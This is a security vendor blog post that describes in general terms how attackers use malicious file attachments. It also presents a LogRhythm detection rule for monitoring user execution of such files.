The ‘Security Spotlight’ series of blogs is written in accompaniment with the YouTube series of the same name, which is aimed at providing quick visibility and understanding into how you can leverage the LogRhythm platform against a variety of threats.
In this Security Spotlight, we’ll be talking about how you can monitor for users unwittingly executing malicious files (MITRE Technique T1204.002).
What are malicious files?
When an attacker looks to execute the initial access phase of an attack through techniques such as spearfishing, they can utilize various attachment files for payload execution, with the most popular choices being PDF, XLS, EXE, and DOC. An attacker’s objective for this phase of the attack is to entice the user to open the file, allowing the malicious code within to run rampant on the target machine.
To achieve this, attackers will devise a way to deceive the end user – by obfuscating the true nature of a malicious file and masquerading it as something legitimate. Attacks like this increase in success when it is the result of a targeted social engineering attack, as the probability of the user opening the file and allowing the malicious code to run skyrockets. To add fuel to the fire, while the primary method of execution involves immediately triggering the malicious code, attackers can also choose to drop these types of files in a shared directory on a user’s desktop. All that is left, then, is to wait for the user to unwittingly click and open the file.
Why develop a response process?
The reality is that even with the most robust and mature security processes, there will always be a human element to business. With said human element comes the potential for manipulation and mistakes.
Recognizing that, education, while undoubtedly essential, is not 100% effective is key to developing appropriate response processes to these end-user-targeted attack vectors. Implementing these response processes is imperative as all it takes is one miss-click or one curious user to open a malicious file for code to be run and cause things to go up in flames.
Look at the MGM hack that happened just last week. While it wasn’t necessarily a malicious file that triggered the attack, social engineering undoubtedly played a crucial role in gaining access to the environment as attackers spoofed a real employee on a support call.
How can LogRhythm help?
The LogRhythm Co-Pilot team has created a rule to monitor for malicious file execution based on threat emulation tests done using the Red Canary framework. This allowed for a comprehensive rule to be created – one that maps against various potential malicious executions. This comprehensiveness can definitely be expanded through additional testing using tools like MITRE Caldera or collaborating with red teams.
LogRhythm has seen a growing trend in the market of attackers bypassing or turning off EDR tools as part of the initial access phase. Hence, the requirement for increased OS-level logging is clear. Centralizing workstation visibility either directly or through implementing something akin to Windows Event Forwarding is becoming increasingly essential.
The rule focuses on monitoring for processed creation logs with command line execution in instances where a mismatch exists between the expected process and parent process names, along with regex to identify key markers of malicious code execution.
For more information on how to enable these rules within your LogRhythm deployment, check out our community page to read more, download, and then import the rule into your platform.
For other Security Spotlight episodes, you can access the full playlist here.